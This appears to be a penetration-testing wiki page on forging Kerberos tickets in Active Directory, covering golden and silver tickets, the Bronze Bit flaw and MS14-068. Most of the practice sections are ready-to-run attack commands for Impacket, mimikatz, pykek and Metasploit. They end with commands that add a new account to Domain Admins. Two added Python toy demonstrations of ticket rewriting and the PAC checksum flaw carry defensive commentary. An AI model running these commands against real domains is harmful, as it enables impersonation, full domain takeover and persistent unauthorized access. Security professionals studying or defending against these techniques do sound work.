Forged tickets

MITRE ATT&CK™ Sub-techniques T1558.001 and T1558.002

Theory

Silver and golden tickets are forged Kerberos tickets that can be used with pass-the-ticket to access services in an Active Directory domain. Forgery is possible because a ticket's encrypted part (including the PAC that carries the user's identity and group memberships) is protected only by the long-term key of the account the ticket is issued for: whoever holds that key can craft a ticket the recipient will accept.

  • Golden ticket: The NT hash (or AES key) of the special account krbtgt can be used to forge a special TGT (Ticket Granting Ticket) that can later be used with Pass-the-ticket to access any resource within the AD domain.

  • Silver ticket: The NT hash (or AES key) of a service account can be used to forge a Service ticket that can later be used with Pass-the-ticket to access that service (and only that service, on the host its SPN points to).

The Bronze Bit vulnerability (CVE-2020-17049) allowed an attacker holding a service account's key to set the forwardable flag on a service ticket obtained through S4U2self, and thus to use it in S4U2proxy when that should have been refused: when the impersonated user is protected against delegation (member of Protected Users, or flagged "Account is sensitive and cannot be delegated"), or when the controlled service is configured for constrained delegation without protocol transition (Kerberos only).

  • MS14-068 (CVE-2014-6324): before the November 2014 patch, domain controllers accepted PAC signatures computed with unkeyed checksum algorithms (such as MD5). Any domain user could submit a forged PAC claiming membership of privileged groups and obtain a TGT embedding it, without knowing the krbtgt key.

Practice

The following sections show how to obtain forged or modified Kerberos tickets. Once obtained, these tickets can be used with Pass-the-Ticket.

Golden ticket

In order to craft a golden ticket, testers need the krbtgt account's NT hash or AES key (128 or 256 bits) and the domain SID. In most cases, the krbtgt key can only be obtained with domain admin privileges (e.g. through a DCSync attack). Golden tickets are therefore a persistence and lateral movement technique rather than a privilege escalation one; they remain valid until the krbtgt password has been reset twice.

Microsoft now uses AES 256 bits by default for Kerberos tickets. Forging tickets with the AES key (instead of the NT hash, which yields RC4-HMAC tickets, encryption type 0x17) is stealthier: RC4-encrypted tickets stand out in the Kerberos events of a domain where AES is the norm.

UNIX-like

Impacket provides a script for each step of a golden ticket creation: retrieving the krbtgt key (secretsdump.py, i.e. DCSync), retrieving the domain SID (lookupsid.py), and creating the golden ticket (ticketer.py).

# Find the domain SID
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0

# Create the golden ticket (with an NT hash)
ticketer.py -nthash $krbtgtNThash -domain-sid $domainSID -domain $DOMAIN randomuser

# Create the golden ticket (with an AES 128/256bits key)
ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser
Windows

On Windows, mimikatz (C) can be used for this attack.

# with an NT hash
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:randomuser /ptt

# with an AES 128 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$krbtgt_aes128_key /user:randomuser /ptt

# with an AES 256 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:randomuser /ptt

For both mimikatz and Rubeus, the /ptt flag is used to automatically inject the ticket.

Silver ticket

In order to craft a silver ticket, testers need to find the target service account's NT hash or AES key (128 or 256 bits), as well as the domain SID. Since the service decrypts and trusts the ticket with its own key, the forged PAC is generally not checked by a domain controller (PAC validation is rarely performed by services).

"While the scope is more limited than Golden Tickets, the required hash is easier to get and there is no communication with a DC when using them, so detection is more difficult than Golden Tickets." (adsecurity.org)

UNIX-like

The Impacket script ticketer.py can create silver tickets.

# Find the domain SID
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0

# with an NT hash
ticketer.py -nthash $NThash -domain-sid $DomainSID -domain $DOMAIN -spn $SPN $Username

# with an AES (128 or 256 bits) key
ticketer.py -aesKey $AESkey -domain-sid $DomainSID -domain $DOMAIN -spn $SPN $Username

The SPN (ServicePrincipalName) set in the ticket determines which service is reachable: the ticket is only valid for that service class on that host. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).

Windows

On Windows, mimikatz can be used to generate a silver ticket: the kerberos::golden module is reused with the /target and /service arguments. Testers need to carefully choose the right SPN type (cifs, http, ldap, host, rpcss) depending on the intended usage.

# with an NT hash
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$service_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt

# with an AES 128 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$service_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt

# with an AES 256 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$service_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt

For both mimikatz and Rubeus, the /ptt flag is used to automatically inject the ticket.

Bronze bit (CVE-2020-17049)

In order to exploit this vulnerability, attackers need to find a service able to delegate to another service (see Kerberos delegations), and they need that first service account's NT hash or AES key (128 or 256 bits). The domain controllers must also be unpatched: Microsoft fixed the vulnerability in November 2020, with an enforcement phase in February 2021.

For example, with constrained delegation configured from a controlled service to a target service, protocol transition enabled, and the impersonated user protected against delegation, the Impacket script getST (Python) can perform all the necessary steps (S4U2self, forwardable flag flip, S4U2proxy) to obtain the final "impersonating" service ticket. In this example, "Administrator" is the impersonated account, but it can be any user in the environment.

The input credentials are those of the compromised service account configured with constrained delegations.

# with an NT hash
getST.py -force-forwardable -spn $Target_SPN -impersonate Administrator -dc-ip $Domain_controller -hashes :$Controlled_service_NThash $Domain/$Controlled_service_account

# with an AES (128 or 256 bits) key
getST.py -force-forwardable -spn $Target_SPN -impersonate Administrator -dc-ip $Domain_controller -aesKey $Controlled_service_AES_key $Domain/$Controlled_service_account

The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. With constrained delegation, it must be one of the SPNs the controlled service is allowed to delegate to (its msDS-AllowedToDelegateTo attribute). For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).
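The silver ticket and Bronze Bit sections above rest on the same property: a service ticket's encrypted part is protected only by the service account's key, so whoever holds that key can decrypt it, change the forwardable flag, the client name or the group RIDs in the PAC, and re-encrypt it, and the service cannot tell. The following Python is an added example, not code from The Hacker Recipes or from Impacket. It implements RC4-HMAC (etype 23, the encryption type an NT hash is used with) from RFC 4757 in pure Python and applies it to a constructed, simplified ticket body; the key, names and RIDs are made up. The same reasoning applies to a TGT and the krbtgt key, which is why golden tickets work.

```python
"""Added example, not from The Hacker Recipes or Impacket: pure-Python RC4-HMAC
(etype 23, RFC 4757) encrypt/decrypt, used to show why holding the key of the
account a ticket is issued for is enough to rewrite that ticket's encrypted
part. This is the trust model behind golden tickets (krbtgt key), silver
tickets (service key) and the Bronze Bit flag flip. The ticket body is a
constructed toy layout, not real Kerberos ASN.1."""
import hashlib
import hmac
import os
import struct

KEY_USAGE_TICKET = 2           # RFC 4120 s7.5.1: ticket enc-part, encrypted with the service key
FLAG_FORWARDABLE = 0x40000000  # RFC 4120 TicketFlags bit 1 (bit string read MSB-first)
RID_DOMAIN_ADMINS = 512


def _rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA), XORed over data."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _usage_bytes(keyusage: int) -> bytes:
    # RFC 4757 s3: T is the key usage as a 4-byte little-endian int, except that
    # usages 3 and 9 map to 8 and usage 23 maps to 13.
    return struct.pack("<i", {3: 8, 9: 8, 23: 13}.get(keyusage, keyusage))


def rc4_hmac_encrypt(key: bytes, keyusage: int, plaintext: bytes, confounder: bytes = None) -> bytes:
    k1 = hmac.new(key, _usage_bytes(keyusage), hashlib.md5).digest()
    data = (confounder or os.urandom(8)) + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + _rc4(k3, data)


def rc4_hmac_decrypt(key: bytes, keyusage: int, ciphertext: bytes) -> bytes:
    checksum, body = ciphertext[:16], ciphertext[16:]
    k1 = hmac.new(key, _usage_bytes(keyusage), hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    data = _rc4(k3, body)
    if not hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum):
        raise ValueError("RC4-HMAC integrity check failed: wrong key or tampered ciphertext")
    return data[8:]  # drop the 8-byte confounder


# Constructed toy ticket body: 32-bit flags, client name, list of group RIDs.
def pack_body(flags: int, cname: str, rids: list) -> bytes:
    name = cname.encode()
    return (struct.pack(">IB", flags, len(name)) + name + bytes([len(rids)])
            + b"".join(struct.pack(">I", r) for r in rids))


def unpack_body(blob: bytes) -> dict:
    flags, nlen = struct.unpack_from(">IB", blob, 0)
    cname = blob[5:5 + nlen].decode()
    count = blob[5 + nlen]
    rids = list(struct.unpack_from(">%dI" % count, blob, 6 + nlen))
    return {"flags": flags, "cname": cname, "rids": rids}


def rewrite_ticket(key: bytes, enc_part: bytes, **changes) -> bytes:
    """What any holder of the key can do (the KDC, or an attacker who dumped it):
    decrypt, edit fields, re-encrypt. Nothing outside that key can tell."""
    body = unpack_body(rc4_hmac_decrypt(key, KEY_USAGE_TICKET, enc_part))
    body.update(changes)
    return rc4_hmac_encrypt(key, KEY_USAGE_TICKET, pack_body(**body))


def demo() -> dict:
    service_key = bytes(range(16))  # constructed stand-in for a service account NT hash
    issued = rc4_hmac_encrypt(service_key, KEY_USAGE_TICKET, pack_body(0, "lowpriv", [513]))
    # Bronze Bit: the KDC refused to set forwardable; the key holder sets it anyway.
    bronze = unpack_body(rc4_hmac_decrypt(
        service_key, KEY_USAGE_TICKET, rewrite_ticket(service_key, issued, flags=FLAG_FORWARDABLE)))
    # Silver ticket: same key, now identity and group RIDs are rewritten as well.
    silver = unpack_body(rc4_hmac_decrypt(service_key, KEY_USAGE_TICKET, rewrite_ticket(
        service_key, issued, cname="Administrator", rids=[513, RID_DOMAIN_ADMINS])))
    # Without the key, flipping a ciphertext bit is caught by the HMAC.
    tampered = issued[:16] + bytes([issued[16] ^ 0x40]) + issued[17:]
    try:
        rc4_hmac_decrypt(service_key, KEY_USAGE_TICKET, tampered)
        blind_flip_detected = False
    except ValueError:
        blind_flip_detected = True
    return {"bronze_forwardable": bool(bronze["flags"] & FLAG_FORWARDABLE),
            "silver": silver, "blind_flip_detected": blind_flip_detected}


if __name__ == "__main__":
    print(demo())
```

The last part of demo() is the point for defenders: the HMAC-MD5 checksum does stop anyone who lacks the key from flipping a bit, so the only real defence is keeping service and krbtgt keys out of attackers' hands (and, for the forwardable flag, the Bronze Bit patch, which has the KDC re-sign the flags).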

MS14-068 (CVE-2014-6324)

This vulnerability allowed attackers to forge a TGT with unlimited power (i.e. with a modified PAC stating the user is a member of privileged groups such as Domain Admins). Unpatched domain controllers accepted PAC signatures computed with unkeyed checksum algorithms (such as MD5), so any domain user could have a forged PAC accepted by the KDC and embedded in a freshly issued TGT. The attack is similar to the golden ticket, but it doesn't require the attacker to know the krbtgt key: valid credentials of any domain user are enough. This makes it a really powerful privilege escalation technique. However, it will not work on domain controllers patched since November 2014.
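The check that MS14-068 broke, as an added example (not from The Hacker Recipes, pykek or Microsoft): a toy KDC-side PAC signature verifier in its unpatched and patched forms. The PAC layout is a constructed stand-in for MS-PAC, the keys and RIDs are made up, and the keyed signature follows the RFC 4757 HMAC-MD5 checksum with the MS-PAC key usage 17; the unkeyed types are the RFC 3961 rsa-md5 (7) and crc32 (1) checksums an attacker can compute without any key.

```python
"""Added example, not from The Hacker Recipes, pykek or Microsoft: a toy PAC
signature check in its MS14-068 (unpatched) and patched forms. The unpatched
KDC trusted the signature type named inside the client-supplied PAC, so an
unkeyed RFC 3961 checksum (rsa-md5 = 7, crc32 = 1) "signed" a forged PAC
with no key at all. The PAC layout here is a constructed stand-in for MS-PAC."""
import hashlib
import hmac
import struct
import zlib

KERB_CHECKSUM_HMAC_MD5 = 0xFFFFFF76   # MS-PAC keyed signature type used with RC4 keys
CHECKSUM_RSA_MD5 = 7                  # RFC 3961 unkeyed checksum
CHECKSUM_CRC32 = 1                    # RFC 3961 unkeyed checksum
KEYED_TYPES = {KERB_CHECKSUM_HMAC_MD5}
KERB_NON_KERB_CKSUM_SALT = 17         # MS-PAC key usage number for PAC signatures
RID_DOMAIN_ADMINS = 512


def checksum(ctype: int, key: bytes, data: bytes) -> bytes:
    """PAC signature of the given type; only the HMAC type actually uses the key."""
    if ctype == KERB_CHECKSUM_HMAC_MD5:  # RFC 4757 s4 HMAC-MD5 checksum
        ksign = hmac.new(key, b"signaturekey\x00", hashlib.md5).digest()
        tmp = hashlib.md5(struct.pack("<i", KERB_NON_KERB_CKSUM_SALT) + data).digest()
        return hmac.new(ksign, tmp, hashlib.md5).digest()
    if ctype == CHECKSUM_RSA_MD5:
        return hashlib.md5(data).digest()
    if ctype == CHECKSUM_CRC32:
        return struct.pack("<I", zlib.crc32(data))
    raise ValueError("unsupported checksum type %#x" % ctype)


# Constructed PAC: user RID, group RIDs, signature type, then the two signatures.
# MS-PAC signs the whole PAC with the signature fields zeroed; here the signed
# region is simply everything that precedes them, which serves the same purpose.
def pack_signed_region(user_rid: int, rids: list, ctype: int) -> bytes:
    return (struct.pack(">IB", user_rid, len(rids))
            + b"".join(struct.pack(">I", r) for r in rids) + struct.pack(">I", ctype))


def sign_pac(user_rid: int, rids: list, ctype: int, key: bytes) -> bytes:
    """Server signature over the signed region, KDC signature over the server
    signature. In a TGT both are made with the krbtgt key (the 'server' is krbtgt)."""
    region = pack_signed_region(user_rid, rids, ctype)
    server_sig = checksum(ctype, key, region)
    kdc_sig = checksum(ctype, key, server_sig)
    return region + bytes([len(server_sig)]) + server_sig + bytes([len(kdc_sig)]) + kdc_sig


def parse_pac(pac: bytes) -> dict:
    user_rid, count = struct.unpack_from(">IB", pac, 0)
    rids = list(struct.unpack_from(">%dI" % count, pac, 5))
    off = 5 + 4 * count
    (ctype,) = struct.unpack_from(">I", pac, off)
    off += 4
    slen = pac[off]
    server_sig = pac[off + 1:off + 1 + slen]
    off += 1 + slen
    klen = pac[off]
    kdc_sig = pac[off + 1:off + 1 + klen]
    return {"user_rid": user_rid, "rids": rids, "ctype": ctype,
            "server_sig": server_sig, "kdc_sig": kdc_sig}


def kdc_verify_unpatched(pac: bytes, krbtgt_key: bytes) -> bool:
    """MS14-068: the KDC recomputes whatever type the PAC names, keyed or not."""
    p = parse_pac(pac)
    region = pack_signed_region(p["user_rid"], p["rids"], p["ctype"])
    return (hmac.compare_digest(checksum(p["ctype"], krbtgt_key, region), p["server_sig"])
            and hmac.compare_digest(checksum(p["ctype"], krbtgt_key, p["server_sig"]), p["kdc_sig"]))


def kdc_verify_patched(pac: bytes, krbtgt_key: bytes) -> bool:
    """Post-MS14-068: only keyed signature types are acceptable at all."""
    return parse_pac(pac)["ctype"] in KEYED_TYPES and kdc_verify_unpatched(pac, krbtgt_key)


def demo() -> dict:
    krbtgt_key = bytes(range(16, 32))  # constructed stand-in for the krbtgt NT hash
    legit = sign_pac(1105, [513], KERB_CHECKSUM_HMAC_MD5, krbtgt_key)
    # Attacker: knows their own RID, picks rsa-md5, claims Domain Admins, has no key.
    forged = sign_pac(1105, [513, RID_DOMAIN_ADMINS], CHECKSUM_RSA_MD5, b"")
    return {
        "legit_unpatched": kdc_verify_unpatched(legit, krbtgt_key),
        "legit_patched": kdc_verify_patched(legit, krbtgt_key),
        "forged_unpatched": kdc_verify_unpatched(forged, krbtgt_key),
        "forged_patched": kdc_verify_patched(forged, krbtgt_key),
        "forged_rids": parse_pac(forged)["rids"],
    }


if __name__ == "__main__":
    print(demo())
```

The fix is the one-line type allowlist in kdc_verify_patched: the signature algorithm must be fixed by the verifier's policy, never chosen by the party being verified. The same pattern (attacker-selected "alg") recurs in JWT and SAML bugs.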

pykek

This attack can be operated with pykek's ms14-068 Python script. The script can carry out the attack with a cleartext password or with pass-the-hash.

# with a plaintext password
ms14-068.py -u 'USER'@'DOMAIN_FQDN' -p 'PASSWORD' -s 'USER_SID' -d 'DOMAIN_CONTROLLER'

# with pass-the-hash
ms14-068.py -u 'USER'@'DOMAIN_FQDN' --rc4 'NThash' -s 'USER_SID' -d 'DOMAIN_CONTROLLER'

If the attack is successful, the script will write a .ccache ticket that will be usable with pass-the-ticket.

metasploit

Using the Metasploit Framework can sometimes be more useful since it prints valuable error information.

msf6 > use admin/kerberos/ms14_068_kerberos_checksum

In some scenarios, I personally have had trouble using the .ccache ticket on UNIX-like systems. What I did was convert it to .kirbi (e.g. with Impacket's ticketConverter.py), switch to a Windows system, inject the ticket with mimikatz's kerberos::ptt command, and then create a new user and add it to the Domain Admins group.

net user "hacker" "132Pentest!!!" /domain /add
net group "Domain Admins" "hacker" /domain /add
